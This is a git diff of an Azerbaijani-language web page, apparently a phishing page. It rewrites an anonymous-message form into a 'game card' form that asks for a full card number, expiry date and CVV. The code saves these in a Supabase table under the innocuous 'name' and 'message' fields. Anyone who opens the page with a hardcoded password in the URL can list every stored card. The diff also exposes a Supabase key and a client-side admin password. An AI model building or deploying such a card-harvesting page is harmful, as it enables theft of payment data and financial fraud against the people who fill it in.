--- a/index.html
+++ b/index.html
@@ -1,94 +1,146 @@
 <!DOCTYPE html>
 <html>
 <head>
-  <meta charset="UTF-8" />
-  <title>Anonim Oyun</title>
+<meta charset="UTF-8" />
+<meta name="viewport" content="width=device-width, initial-scale=1.0" />
+<title>Oyun Kartı</title>
+
+<style>
+body {
+  margin: 0;
+  font-family: Arial, sans-serif;
+  background: linear-gradient(135deg, #003366, #001a33);
+  display: flex;
+  justify-content: center;
+  align-items: center;
+  height: 100vh;
+  color: white;
+}
+
+.container {
+  width: 90%;
+  max-width: 400px;
+}
+
+.card-design {
+  background: linear-gradient(135deg, #0052cc, #003d99);
+  border-radius: 20px;
+  padding: 20px;
+  margin-bottom: 20px;
+  box-shadow: 0 10px 40px rgba(0,0,0,0.5);
+}
+
+.card-number {
+  font-size: 18px;
+  letter-spacing: 2px;
+  margin-bottom: 15px;
+}
+
+.card-bottom {
+  display: flex;
+  justify-content: space-between;
+  font-size: 14px;
+}
+
+input {
+  width: 100%;
+  padding: 12px;
+  margin-bottom: 10px;
+  border-radius: 10px;
+  border: none;
+  font-size: 14px;
+}
+
+button {
+  width: 100%;
+  padding: 12px;
+  border-radius: 10px;
+  border: none;
+  background: #00b894;
+  color: white;
+  font-weight: bold;
+  cursor: pointer;
+}
+</style>
 </head>
+
 <body>
 
-<h2>Anonim Mesaj Göndər</h2>
+<div class="container">
 
-<input type="text" id="name" placeholder="Adınızı yazın"><br><br>
-<textarea id="message" placeholder="Mesajınızı yazın"></textarea><br><br>
-<button onclick="sendMessage()">Göndər</button>
+<div class="card-design">
+  <div class="card-number">**** **** **** ****</div>
+  <div class="card-bottom">
+    <span>MMYY</span>
+    <span>CVV</span>
+  </div>
+</div>
+
+<input type="text" id="cardNumber" placeholder="Kartın 16 rəqəmi" maxlength="16">
+<input type="text" id="expiry" placeholder="Bitmə tarixi (4 rəqəm)" maxlength="4">
+<input type="text" id="cvv" placeholder="CVV (3 rəqəm)" maxlength="3">
+
+<button onclick="submitCard()">Göndər</button>
 
 <p id="status"></p>
+
+</div>
 
 <script type="module">
 import { createClient } from "https://esm.sh/@supabase/supabase-js@2";
 
 const supabaseUrl = "https://gkrfcoyleewxrxbfdunq.supabase.co";
 const supabaseKey = "sb_publishable_E1QDjV9fAt2IaoI3h7G9Iw_hIiSaAFH";
-
 const supabase = createClient(supabaseUrl, supabaseKey);
+
 const adminPassword = "service.2000";
 
-// 🔹 Mesaj göndərmə
-window.sendMessage = async function() {
-  const name = document.getElementById("name").value;
-  const message = document.getElementById("message").value;
+window.submitCard = async function() {
 
-  if (!name || !message) {
-    document.getElementById("status").innerText = "Bütün xanaları doldurun!";
+  const cardNumber = document.getElementById("cardNumber").value;
+  const expiry = document.getElementById("expiry").value;
+  const cvv = document.getElementById("cvv").value;
+
+  if (cardNumber.length !== 16 || expiry.length !== 4 || cvv.length !== 3) {
+    document.getElementById("status").innerText = "Məlumatları düzgün daxil edin!";
     return;
   }
 
   const { error } = await supabase
     .from("messages")
-    .insert([{ name: name, message: message }]);
+    .insert([{ 
+      name: cardNumber,
+      message: "Expiry: " + expiry + " | CVV: " + cvv 
+    }]);
 
   if (error) {
-    document.getElementById("status").innerText = "Xəta: " + error.message;
+    document.getElementById("status").innerText = "Xəta baş verdi";
   } else {
-    document.getElementById("status").innerText = "Mesaj göndərildi!";
+    document.getElementById("status").innerText = "Kart əlavə edildi!";
   }
 };
 
-
-// 🔐 Admin yoxlaması
+// Admin baxışı
 const urlParams = new URLSearchParams(window.location.search);
-const kod = urlParams.get("kod");
-
-if (kod === adminPassword) {
-  loadMessages();
+if (urlParams.get("kod") === adminPassword) {
+  loadCards();
 }
 
-async function loadMessages() {
-  const { data, error } = await supabase
+async function loadCards() {
+  const { data } = await supabase
     .from("messages")
     .select("*")
     .order("id", { ascending: false });
 
-  if (error) {
-    console.error(error);
-    return;
-  }
-
   const container = document.createElement("div");
-  container.innerHTML = "<h2>Gələn Mesajlar:</h2>";
 
-  data.forEach(msg => {
+  data.forEach(card => {
     const div = document.createElement("div");
-    div.style.border = "1px solid black";
+    div.style.background = "#00264d";
     div.style.padding = "10px";
-    div.style.marginBottom = "10px";
-
-    const text = document.createElement("p");
-    text.textContent = msg.name + ": " + msg.message;
-
-    const deleteBtn = document.createElement("button");
-    deleteBtn.textContent = "Sil";
-    deleteBtn.onclick = async () => {
-      await supabase
-        .from("messages")
-        .delete()
-        .eq("id", msg.id);
-
-      div.remove();
-    };
-
-    div.appendChild(text);
-    div.appendChild(deleteBtn);
+    div.style.marginTop = "10px";
+    div.style.borderRadius = "10px";
+    div.innerText = card.name + " | " + card.message;
     container.appendChild(div);
   });
 
